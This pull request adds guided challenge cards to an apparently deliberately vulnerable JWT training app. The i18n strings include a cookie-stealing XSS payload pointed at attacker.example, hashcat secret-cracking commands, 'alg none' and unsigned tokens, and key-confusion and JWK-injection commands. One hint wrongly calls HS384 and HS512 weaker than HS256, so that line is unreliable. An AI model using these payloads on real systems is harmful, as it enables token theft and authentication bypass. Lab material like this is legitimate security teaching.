### PR TITLE
Add Challenge mode to JWT Vulnerability (#557)

### DIFF
--- a/src/main/java/org/sasanlabs/service/vulnerability/jwt/JWTVulnerability.java
+++ b/src/main/java/org/sasanlabs/service/vulnerability/jwt/JWTVulnerability.java
@@ -15,6 +15,7 @@ import org.apache.logging.log4j.LogManager;
 import org.apache.logging.log4j.Logger;
 import org.sasanlabs.internal.utility.LevelConstants;
 import org.sasanlabs.internal.utility.annotations.AttackVector;
+import org.sasanlabs.internal.utility.annotations.ChallengeCard;
 import org.sasanlabs.internal.utility.annotations.VulnerableAppRequestMapping;
 import org.sasanlabs.internal.utility.annotations.VulnerableAppRestController;
 import org.sasanlabs.service.exception.ServiceApplicationException;
@@ -95,6 +96,17 @@ public class JWTVulnerability {
     @AttackVector(
             vulnerabilityExposed = VulnerabilityType.CLIENT_SIDE_VULNERABLE_JWT,
             description = "JWT_URL_EXPOSING_SECURE_INFORMATION")
+    @ChallengeCard(
+            challengeText = "JWT_LEVEL_1_CHALLENGE",
+            hints = {
+                @ChallengeCard.Hint(order = 1, text = "JWT_LEVEL_1_HINT_1"),
+                @ChallengeCard.Hint(order = 2, text = "JWT_LEVEL_1_HINT_2"),
+                @ChallengeCard.Hint(order = 3, text = "JWT_LEVEL_1_HINT_3")
+            },
+            payload =
+                    @ChallengeCard.Payload(
+                            description = "JWT_LEVEL_1_PAYLOAD_DESCRIPTION",
+                            value = "JWT_LEVEL_1_PAYLOAD_VALUE"))
     @VulnerableAppRequestMapping(
             value = LevelConstants.LEVEL_1,
             htmlTemplate = "LEVEL_1/JWT_Level1")
@@ -126,6 +138,17 @@ public class JWTVulnerability {
     @AttackVector(
             vulnerabilityExposed = VulnerabilityType.CLIENT_SIDE_VULNERABLE_JWT,
             description = "COOKIE_CONTAINING_JWT_TOKEN_SECURITY_ATTRIBUTES_MISSING")
+    @ChallengeCard(
+            challengeText = "JWT_LEVEL_2_CHALLENGE",
+            hints = {
+                @ChallengeCard.Hint(order = 1, text = "JWT_LEVEL_2_HINT_1"),
+                @ChallengeCard.Hint(order = 2, text = "JWT_LEVEL_2_HINT_2"),
+                @ChallengeCard.Hint(order = 3, text = "JWT_LEVEL_2_HINT_3")
+            },
+            payload =
+                    @ChallengeCard.Payload(
+                            description = "JWT_LEVEL_2_PAYLOAD_DESCRIPTION",
+                            value = "JWT_LEVEL_2_PAYLOAD_VALUE"))
     @VulnerableAppRequestMapping(
             value = LevelConstants.LEVEL_2,
             htmlTemplate = "LEVEL_2/JWT_Level2")
@@ -178,6 +201,17 @@ public class JWTVulnerability {
     @AttackVector(
             vulnerabilityExposed = VulnerabilityType.CLIENT_SIDE_VULNERABLE_JWT,
             description = "COOKIE_WITH_HTTPONLY_WITHOUT_SECURE_FLAG_BASED_JWT_VULNERABILITY")
+    @ChallengeCard(
+            challengeText = "JWT_LEVEL_3_CHALLENGE",
+            hints = {
+                @ChallengeCard.Hint(order = 1, text = "JWT_LEVEL_3_HINT_1"),
+                @ChallengeCard.Hint(order = 2, text = "JWT_LEVEL_3_HINT_2"),
+                @ChallengeCard.Hint(order = 3, text = "JWT_LEVEL_3_HINT_3")
+            },
+            payload =
+                    @ChallengeCard.Payload(
+                            description = "JWT_LEVEL_3_PAYLOAD_DESCRIPTION",
+                            value = "JWT_LEVEL_3_PAYLOAD_VALUE"))
     @VulnerableAppRequestMapping(
             value = LevelConstants.LEVEL_3,
             htmlTemplate = "LEVEL_2/JWT_Level2")
@@ -232,6 +266,17 @@ public class JWTVulnerability {
     @AttackVector(
             vulnerabilityExposed = VulnerabilityType.INSECURE_CONFIGURATION_JWT,
             description = "COOKIE_BASED_LOW_KEY_STRENGTH_JWT_VULNERABILITY")
+    @ChallengeCard(
+            challengeText = "JWT_LEVEL_4_CHALLENGE",
+            hints = {
+                @ChallengeCard.Hint(order = 1, text = "JWT_LEVEL_4_HINT_1"),
+                @ChallengeCard.Hint(order = 2, text = "JWT_LEVEL_4_HINT_2"),
+                @ChallengeCard.Hint(order = 3, text = "JWT_LEVEL_4_HINT_3")
+            },
+            payload =
+                    @ChallengeCard.Payload(
+                            description = "JWT_LEVEL_4_PAYLOAD_DESCRIPTION",
+                            value = "JWT_LEVEL_4_PAYLOAD_VALUE"))
     @VulnerableAppRequestMapping(
             value = LevelConstants.LEVEL_4,
             htmlTemplate = "LEVEL_2/JWT_Level2")
@@ -287,6 +332,17 @@ public class JWTVulnerability {
     @AttackVector(
             vulnerabilityExposed = {VulnerabilityType.SERVER_SIDE_VULNERABLE_JWT},
             description = "COOKIE_BASED_NULL_BYTE_JWT_VULNERABILITY")
+    @ChallengeCard(
+            challengeText = "JWT_LEVEL_5_CHALLENGE",
+            hints = {
+                @ChallengeCard.Hint(order = 1, text = "JWT_LEVEL_5_HINT_1"),
+                @ChallengeCard.Hint(order = 2, text = "JWT_LEVEL_5_HINT_2"),
+                @ChallengeCard.Hint(order = 3, text = "JWT_LEVEL_5_HINT_3")
+            },
+            payload =
+                    @ChallengeCard.Payload(
+                            description = "JWT_LEVEL_5_PAYLOAD_DESCRIPTION",
+                            value = "JWT_LEVEL_5_PAYLOAD_VALUE"))
     @VulnerableAppRequestMapping(
             value = LevelConstants.LEVEL_5,
             htmlTemplate = "LEVEL_2/JWT_Level2")
@@ -343,6 +399,17 @@ public class JWTVulnerability {
             vulnerabilityExposed = VulnerabilityType.SERVER_SIDE_VULNERABLE_JWT,
             description = "COOKIE_BASED_NONE_ALGORITHM_JWT_VULNERABILITY",
             payload = "NONE_ALGORITHM_ATTACK_CURL_PAYLOAD")
+    @ChallengeCard(
+            challengeText = "JWT_LEVEL_6_CHALLENGE",
+            hints = {
+                @ChallengeCard.Hint(order = 1, text = "JWT_LEVEL_6_HINT_1"),
+                @ChallengeCard.Hint(order = 2, text = "JWT_LEVEL_6_HINT_2"),
+                @ChallengeCard.Hint(order = 3, text = "JWT_LEVEL_6_HINT_3")
+            },
+            payload =
+                    @ChallengeCard.Payload(
+                            description = "JWT_LEVEL_6_PAYLOAD_DESCRIPTION",
+                            value = "NONE_ALGORITHM_ATTACK_CURL_PAYLOAD"))
     @VulnerableAppRequestMapping(
             value = LevelConstants.LEVEL_6,
             htmlTemplate = "LEVEL_2/JWT_Level2")
@@ -400,6 +467,17 @@ public class JWTVulnerability {
     @AttackVector(
             vulnerabilityExposed = VulnerabilityType.CLIENT_SIDE_VULNERABLE_JWT,
             description = "COOKIE_CONTAINING_JWT_TOKEN_SECURITY_ATTRIBUTES_MISSING")
+    @ChallengeCard(
+            challengeText = "JWT_LEVEL_7_CHALLENGE",
+            hints = {
+                @ChallengeCard.Hint(order = 1, text = "JWT_LEVEL_7_HINT_1"),
+                @ChallengeCard.Hint(order = 2, text = "JWT_LEVEL_7_HINT_2"),
+                @ChallengeCard.Hint(order = 3, text = "JWT_LEVEL_7_HINT_3")
+            },
+            payload =
+                    @ChallengeCard.Payload(
+                            description = "JWT_LEVEL_7_PAYLOAD_DESCRIPTION",
+                            value = "JWT_LEVEL_7_PAYLOAD_VALUE"))
     @VulnerableAppRequestMapping(value = LevelConstants.LEVEL_7, htmlTemplate = "LEVEL_7/JWT_Level")
     public ResponseEntity<GenericVulnerabilityResponseBean<String>>
             getVulnerablePayloadLevelUnsecure7CookieBased(
@@ -447,6 +525,17 @@ public class JWTVulnerability {
     @AttackVector(
             vulnerabilityExposed = VulnerabilityType.SERVER_SIDE_VULNERABLE_JWT,
             description = "COOKIE_BASED_KEY_CONFUSION_JWT_VULNERABILITY")
+    @ChallengeCard(
+            challengeText = "JWT_LEVEL_8_CHALLENGE",
+            hints = {
+                @ChallengeCard.Hint(order = 1, text = "JWT_LEVEL_8_HINT_1"),
+                @ChallengeCard.Hint(order = 2, text = "JWT_LEVEL_8_HINT_2"),
+                @ChallengeCard.Hint(order = 3, text = "JWT_LEVEL_8_HINT_3")
+            },
+            payload =
+                    @ChallengeCard.Payload(
+                            description = "JWT_LEVEL_8_PAYLOAD_DESCRIPTION",
+                            value = "JWT_LEVEL_8_PAYLOAD_VALUE"))
     @VulnerableAppRequestMapping(
             value = LevelConstants.LEVEL_8,
             htmlTemplate = "LEVEL_2/JWT_Level2")
@@ -502,6 +591,17 @@ public class JWTVulnerability {
             vulnerabilityExposed = VulnerabilityType.SERVER_SIDE_VULNERABLE_JWT,
             description = "COOKIE_BASED_FOR_JWK_HEADER_BASED_JWT_VULNERABILITY")
     // https://nvd.nist.gov/vuln/detail/CVE-2018-0114
+    @ChallengeCard(
+            challengeText = "JWT_LEVEL_9_CHALLENGE",
+            hints = {
+                @ChallengeCard.Hint(order = 1, text = "JWT_LEVEL_9_HINT_1"),
+                @ChallengeCard.Hint(order = 2, text = "JWT_LEVEL_9_HINT_2"),
+                @ChallengeCard.Hint(order = 3, text = "JWT_LEVEL_9_HINT_3")
+            },
+            payload =
+                    @ChallengeCard.Payload(
+                            description = "JWT_LEVEL_9_PAYLOAD_DESCRIPTION",
+                            value = "JWT_LEVEL_9_PAYLOAD_VALUE"))
     @VulnerableAppRequestMapping(
             value = LevelConstants.LEVEL_9,
             htmlTemplate = "LEVEL_2/JWT_Level2")
@@ -553,6 +653,17 @@ public class JWTVulnerability {
     @AttackVector(
             vulnerabilityExposed = VulnerabilityType.SERVER_SIDE_VULNERABLE_JWT,
             description = "COOKIE_BASED_EMPTY_TOKEN_JWT_VULNERABILITY")
+    @ChallengeCard(
+            challengeText = "JWT_LEVEL_10_CHALLENGE",
+            hints = {
+                @ChallengeCard.Hint(order = 1, text = "JWT_LEVEL_10_HINT_1"),
+                @ChallengeCard.Hint(order = 2, text = "JWT_LEVEL_10_HINT_2"),
+                @ChallengeCard.Hint(order = 3, text = "JWT_LEVEL_10_HINT_3")
+            },
+            payload =
+                    @ChallengeCard.Payload(
+                            description = "JWT_LEVEL_10_PAYLOAD_DESCRIPTION",
+                            value = "JWT_LEVEL_10_PAYLOAD_VALUE"))
     @VulnerableAppRequestMapping(
             value = LevelConstants.LEVEL_10,
             htmlTemplate = "LEVEL_2/JWT_Level2")
@@ -668,6 +779,17 @@ public class JWTVulnerability {
     @AttackVector(
             vulnerabilityExposed = VulnerabilityType.HEADER_INJECTION,
             description = "HEADER_INJECTION_VULNERABILITY")
+    @ChallengeCard(
+            challengeText = "JWT_LEVEL_13_CHALLENGE",
+            hints = {
+                @ChallengeCard.Hint(order = 1, text = "JWT_LEVEL_13_HINT_1"),
+                @ChallengeCard.Hint(order = 2, text = "JWT_LEVEL_13_HINT_2"),
+                @ChallengeCard.Hint(order = 3, text = "JWT_LEVEL_13_HINT_3")
+            },
+            payload =
+                    @ChallengeCard.Payload(
+                            description = "JWT_LEVEL_13_PAYLOAD_DESCRIPTION",
+                            value = "JWT_LEVEL_13_PAYLOAD_VALUE"))
     @VulnerableAppRequestMapping(
             value = LevelConstants.LEVEL_13,
             htmlTemplate = "LEVEL_13/HeaderInjection_Level13")
@@ -714,6 +836,17 @@ public class JWTVulnerability {
     @AttackVector(
             vulnerabilityExposed = VulnerabilityType.INSECURE_CONFIGURATION_JWT,
             description = "COOKIE_BASED_VERY_WEAK_KEY_STRENGTH_JWT_VULNERABILITY")
+    @ChallengeCard(
+            challengeText = "JWT_LEVEL_14_CHALLENGE",
+            hints = {
+                @ChallengeCard.Hint(order = 1, text = "JWT_LEVEL_14_HINT_1"),
+                @ChallengeCard.Hint(order = 2, text = "JWT_LEVEL_14_HINT_2"),
+                @ChallengeCard.Hint(order = 3, text = "JWT_LEVEL_14_HINT_3")
+            },
+            payload =
+                    @ChallengeCard.Payload(
+                            description = "JWT_LEVEL_14_PAYLOAD_DESCRIPTION",
+                            value = "JWT_LEVEL_14_PAYLOAD_VALUE"))
     @VulnerableAppRequestMapping(
             value = LevelConstants.LEVEL_14,
             htmlTemplate = "LEVEL_2/JWT_Level2")
@@ -768,6 +901,17 @@ public class JWTVulnerability {
     @AttackVector(
             vulnerabilityExposed = VulnerabilityType.SERVER_SIDE_VULNERABLE_JWT,
             description = "COOKIE_BASED_MISSING_SIGNATURE_VERIFICATION_JWT_VULNERABILITY")
+    @ChallengeCard(
+            challengeText = "JWT_LEVEL_15_CHALLENGE",
+            hints = {
+                @ChallengeCard.Hint(order = 1, text = "JWT_LEVEL_15_HINT_1"),
+                @ChallengeCard.Hint(order = 2, text = "JWT_LEVEL_15_HINT_2"),
+                @ChallengeCard.Hint(order = 3, text = "JWT_LEVEL_15_HINT_3")
+            },
+            payload =
+                    @ChallengeCard.Payload(
+                            description = "JWT_LEVEL_15_PAYLOAD_DESCRIPTION",
+                            value = "JWT_LEVEL_15_PAYLOAD_VALUE"))
     @VulnerableAppRequestMapping(
             value = LevelConstants.LEVEL_15,
             htmlTemplate = "LEVEL_2/JWT_Level2")
@@ -821,6 +965,17 @@ public class JWTVulnerability {
     @AttackVector(
             vulnerabilityExposed = VulnerabilityType.INSECURE_CONFIGURATION_JWT,
             description = "COOKIE_BASED_ALGORITHM_DOWNGRADE_JWT_VULNERABILITY")
+    @ChallengeCard(
+            challengeText = "JWT_LEVEL_16_CHALLENGE",
+            hints = {
+                @ChallengeCard.Hint(order = 1, text = "JWT_LEVEL_16_HINT_1"),
+                @ChallengeCard.Hint(order = 2, text = "JWT_LEVEL_16_HINT_2"),
+                @ChallengeCard.Hint(order = 3, text = "JWT_LEVEL_16_HINT_3")
+            },
+            payload =
+                    @ChallengeCard.Payload(
+                            description = "JWT_LEVEL_16_PAYLOAD_DESCRIPTION",
+                            value = "JWT_LEVEL_16_PAYLOAD_VALUE"))
     @VulnerableAppRequestMapping(
             value = LevelConstants.LEVEL_16,
             htmlTemplate = "LEVEL_2/JWT_Level2")

--- a/src/main/resources/i18n/messages.properties
+++ b/src/main/resources/i18n/messages.properties
@@ -241,6 +241,104 @@ COOKIE_BASED_VERY_WEAK_KEY_STRENGTH_JWT_VULNERABILITY=Cookie based JWT token sig
 COOKIE_BASED_MISSING_SIGNATURE_VERIFICATION_JWT_VULNERABILITY=Cookie based JWT token validator that accepts tokens without properly verifying the signature, allowing unsigned or tampered tokens.
 COOKIE_BASED_ALGORITHM_DOWNGRADE_JWT_VULNERABILITY=Cookie based JWT token validator that accepts weaker algorithms without enforcing strong cryptographic algorithms, vulnerable to algorithm downgrade attacks.
 
+# JWT Challenge Cards
+JWT_LEVEL_1_CHALLENGE=Recover the sensitive information carried inside the JWT that the application leaks through the request URL.
+JWT_LEVEL_1_HINT_1=The token is passed as a 'JWT' query parameter, so it lands in browser history, proxy logs and the Referer header.
+JWT_LEVEL_1_HINT_2=A JWT is not encrypted; the header and payload are only Base64URL encoded.
+JWT_LEVEL_1_HINT_3=Copy the value between the first two dots and Base64URL decode it to read every claim in clear text.
+JWT_LEVEL_1_PAYLOAD_DESCRIPTION=Base64URL decode the payload segment of the leaked token to expose its claims.
+JWT_LEVEL_1_PAYLOAD_VALUE=echo 'eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ' | base64 -d
+
+JWT_LEVEL_2_CHALLENGE=Steal the JWT held in a cookie that ships without the HttpOnly and Secure attributes.
+JWT_LEVEL_2_HINT_1=Inspect the Set-Cookie header returned for the JWT and note which security attributes are absent.
+JWT_LEVEL_2_HINT_2=Without HttpOnly the cookie is reachable from JavaScript running in the page.
+JWT_LEVEL_2_HINT_3=A reflected or stored XSS payload can read document.cookie and exfiltrate the token to an attacker endpoint.
+JWT_LEVEL_2_PAYLOAD_DESCRIPTION=JavaScript that reads the non-HttpOnly cookie and exfiltrates the JWT.
+JWT_LEVEL_2_PAYLOAD_VALUE=<script>new Image().src='//attacker.example/steal?c='+document.cookie</script>
+
+JWT_LEVEL_3_CHALLENGE=Capture the JWT cookie that is marked HttpOnly but is still missing the Secure flag.
+JWT_LEVEL_3_HINT_1=HttpOnly stops JavaScript access, but it does nothing to protect the cookie in transit.
+JWT_LEVEL_3_HINT_2=Because the Secure flag is absent the browser will send the cookie over plain HTTP as well as HTTPS.
+JWT_LEVEL_3_HINT_3=A network attacker on the same segment can force an HTTP request and sniff the JWT cookie from the wire.
+JWT_LEVEL_3_PAYLOAD_DESCRIPTION=Observe the cookie being transmitted over an unencrypted HTTP channel.
+JWT_LEVEL_3_PAYLOAD_VALUE=curl -v http://localhost:9090/vulnerable/JWTVulnerability/LEVEL_3
+
+JWT_LEVEL_4_CHALLENGE=Forge a valid token by cracking the weak HMAC secret used to sign it.
+JWT_LEVEL_4_HINT_1=The token is signed with HS256 but the server uses a low strength key.
+JWT_LEVEL_4_HINT_2=A weak secret can be brute forced offline with a wordlist using tools such as hashcat mode 16500 or jwt_tool.
+JWT_LEVEL_4_HINT_3=Once you recover the secret, re-sign a token with tampered claims and replay it.
+JWT_LEVEL_4_PAYLOAD_DESCRIPTION=Crack the HS256 signing secret from a captured token with a wordlist.
+JWT_LEVEL_4_PAYLOAD_VALUE=hashcat -a 0 -m 16500 captured.jwt wordlist.txt
+
+JWT_LEVEL_5_CHALLENGE=Bypass signature validation by abusing the null byte handling in the validator.
+JWT_LEVEL_5_HINT_1=The validator truncates or mishandles the token when a null byte is present.
+JWT_LEVEL_5_HINT_2=Injecting %00 can make the comparison terminate early, treating an invalid signature as valid.
+JWT_LEVEL_5_HINT_3=Append a URL encoded null byte after a crafted signature segment and replay the token.
+JWT_LEVEL_5_PAYLOAD_DESCRIPTION=Null byte appended to the token to short circuit signature comparison.
+JWT_LEVEL_5_PAYLOAD_VALUE=<header>.<payload>.<signature>%00
+
+JWT_LEVEL_6_CHALLENGE=Forge an accepted token by switching the algorithm to 'none' and stripping the signature.
+JWT_LEVEL_6_HINT_1=The validator honours the alg field declared inside the token header.
+JWT_LEVEL_6_HINT_2=Set the header algorithm to 'none' and the server skips signature verification entirely.
+JWT_LEVEL_6_HINT_3=Build a token whose header is {"typ":"JWT","alg":"none"} and leave the signature segment empty.
+JWT_LEVEL_6_PAYLOAD_DESCRIPTION=Replay a none-algorithm token via the JWT cookie to bypass verification.
+
+JWT_LEVEL_7_CHALLENGE=Repeat the none-algorithm forgery, this time delivering the token through the Authorization header.
+JWT_LEVEL_7_HINT_1=This level reads the JWT from the Authorization header instead of a cookie.
+JWT_LEVEL_7_HINT_2=The same none-algorithm weakness applies; the declared alg drives verification.
+JWT_LEVEL_7_HINT_3=Send a header-only token with alg 'none' and an empty signature in the Authorization header.
+JWT_LEVEL_7_PAYLOAD_DESCRIPTION=None-algorithm token supplied through the Authorization header.
+JWT_LEVEL_7_PAYLOAD_VALUE=Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.
+
+JWT_LEVEL_8_CHALLENGE=Exploit the RS256/HS256 key confusion flaw to sign a token with the public key.
+JWT_LEVEL_8_HINT_1=The server issues RS256 tokens but validates by trusting the algorithm named in the token header.
+JWT_LEVEL_8_HINT_2=If you change the header to HS256, the validator uses the RSA public key as the HMAC secret.
+JWT_LEVEL_8_HINT_3=Obtain the public key, then HMAC-SHA256 sign a tampered token using that public key as the secret.
+JWT_LEVEL_8_PAYLOAD_DESCRIPTION=Sign an HS256 token using the RSA public key as the shared secret.
+JWT_LEVEL_8_PAYLOAD_VALUE=jwt_tool <token> -X k -pk public_crt.pem
+
+JWT_LEVEL_9_CHALLENGE=Get a self-signed token accepted by embedding your own key in the JWK header (CVE-2018-0114).
+JWT_LEVEL_9_HINT_1=The validator trusts the public key supplied in the token's jwk header field.
+JWT_LEVEL_9_HINT_2=It never checks whether that key belongs to a trusted key store.
+JWT_LEVEL_9_HINT_3=Generate your own key pair, embed the public key in the jwk header and sign the token with your private key.
+JWT_LEVEL_9_PAYLOAD_DESCRIPTION=Inject an attacker-controlled JWK into the header and self-sign the token.
+JWT_LEVEL_9_PAYLOAD_VALUE=jwt_tool <token> -X i
+
+JWT_LEVEL_10_CHALLENGE=Authenticate with a token whose signature segment is left empty.
+JWT_LEVEL_10_HINT_1=The validator accepts a token even when the signature part is blank.
+JWT_LEVEL_10_HINT_2=Keep a well formed header and payload but drop everything after the final dot.
+JWT_LEVEL_10_HINT_3=Submit header.payload. (trailing dot, no signature) and observe it being trusted.
+JWT_LEVEL_10_PAYLOAD_DESCRIPTION=Token with header and payload but an empty signature segment.
+JWT_LEVEL_10_PAYLOAD_VALUE=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxMjM0NTY3ODkwIn0.
+
+JWT_LEVEL_13_CHALLENGE=Tamper with the JWT header to influence how the signature is verified.
+JWT_LEVEL_13_HINT_1=This level trusts key material referenced from the token header.
+JWT_LEVEL_13_HINT_2=Header parameters such as jwk, jku or kid can redirect verification to an attacker-chosen key.
+JWT_LEVEL_13_HINT_3=Craft a header that points verification at a key you control and re-sign the token.
+JWT_LEVEL_13_PAYLOAD_DESCRIPTION=Manipulated header parameter that steers signature verification.
+JWT_LEVEL_13_PAYLOAD_VALUE={"typ":"JWT","alg":"RS256","jwk":{"kty":"RSA","n":"<attacker-n>","e":"AQAB"}}
+
+JWT_LEVEL_14_CHALLENGE=Brute force the extremely short signing secret and forge an administrative token.
+JWT_LEVEL_14_HINT_1=This level signs tokens with an only-a-few-bytes secret.
+JWT_LEVEL_14_HINT_2=Such a tiny key space falls quickly to a brute force or mask attack.
+JWT_LEVEL_14_HINT_3=Recover the secret, then mint a new token with modified claims and replay it.
+JWT_LEVEL_14_PAYLOAD_DESCRIPTION=Mask attack recovering the very short HMAC secret.
+JWT_LEVEL_14_PAYLOAD_VALUE=hashcat -a 3 -m 16500 captured.jwt ?a?a?a?a
+
+JWT_LEVEL_15_CHALLENGE=Modify the claims of a token that is accepted without any real signature verification.
+JWT_LEVEL_15_HINT_1=The server only checks that the token has three dot separated parts.
+JWT_LEVEL_15_HINT_2=The signature bytes themselves are never validated against the key.
+JWT_LEVEL_15_HINT_3=Edit the payload claims, keep any placeholder signature segment, and the token is trusted.
+JWT_LEVEL_15_PAYLOAD_DESCRIPTION=Token with tampered claims and an unverified signature segment.
+JWT_LEVEL_15_PAYLOAD_VALUE=<header>.<tampered-payload>.<any-signature>
+
+JWT_LEVEL_16_CHALLENGE=Bypass verification by downgrading the token to a weaker accepted algorithm.
+JWT_LEVEL_16_HINT_1=The validator accepts several HMAC algorithms instead of pinning one strong choice.
+JWT_LEVEL_16_HINT_2=Swapping HS256 for a weaker variant such as HS384 or HS512 is tolerated.
+JWT_LEVEL_16_HINT_3=Re-sign the token with a downgraded algorithm the validator still accepts.
+JWT_LEVEL_16_PAYLOAD_DESCRIPTION=Token re-signed with a downgraded HMAC algorithm.
+JWT_LEVEL_16_PAYLOAD_VALUE={"typ":"JWT","alg":"HS384"}
+
 
 
 # SQL Injection Vulnerability


### PR DESCRIPTION
## Description

Implements Challenge mode for the JWT vulnerability module, closing #557.

Following the pattern already merged for Open Redirect (`Http3xxStatusCodeBasedInjection`) and Clickjacking (#661), this adds `@ChallengeCard` annotations to every vulnerable JWT level and the supporting i18n keys, so each level surfaces a guided challenge with hints and an exploit payload.

## Changes

- **`JWTVulnerability.java`** — added `@ChallengeCard` (challenge text + 3 progressive hints + payload) to all 14 vulnerable levels: LEVEL_1–10 and LEVEL_13–16. (LEVEL_11 is commented out in the source and LEVEL_12 does not exist, so both are skipped.)
- **`i18n/messages.properties`** — added the `JWT_LEVEL_<n>_CHALLENGE`, `_HINT_1..3`, `_PAYLOAD_DESCRIPTION` and `_PAYLOAD_VALUE` keys. Each challenge is written to the specific weakness of that level (URL token leak, missing HttpOnly/Secure, weak-key brute force, null-byte bypass, `alg:none`, RS256/HS256 key confusion, JWK header injection / CVE-2018-0114, empty & unverified signatures, algorithm downgrade, etc.). LEVEL_6 reuses the existing `NONE_ALGORITHM_ATTACK_CURL_PAYLOAD` attack-vector payload.

## Testing

- `./gradlew spotlessApply compileJava` — passes (no formatting changes needed).
- `./gradlew test --tests "*JWTVulnerabilityTest*"` — passes.

Closes #557

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **New Features**
  * Added detailed JWT challenge cards for multiple levels, including instructions, hints, and example payloads.
  * Expanded in-app guidance for common JWT weakness scenarios such as weak signing secrets, token tampering, algorithm handling, and header-based attacks.
  * Improved localization content so challenge information is displayed directly within the user experience.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->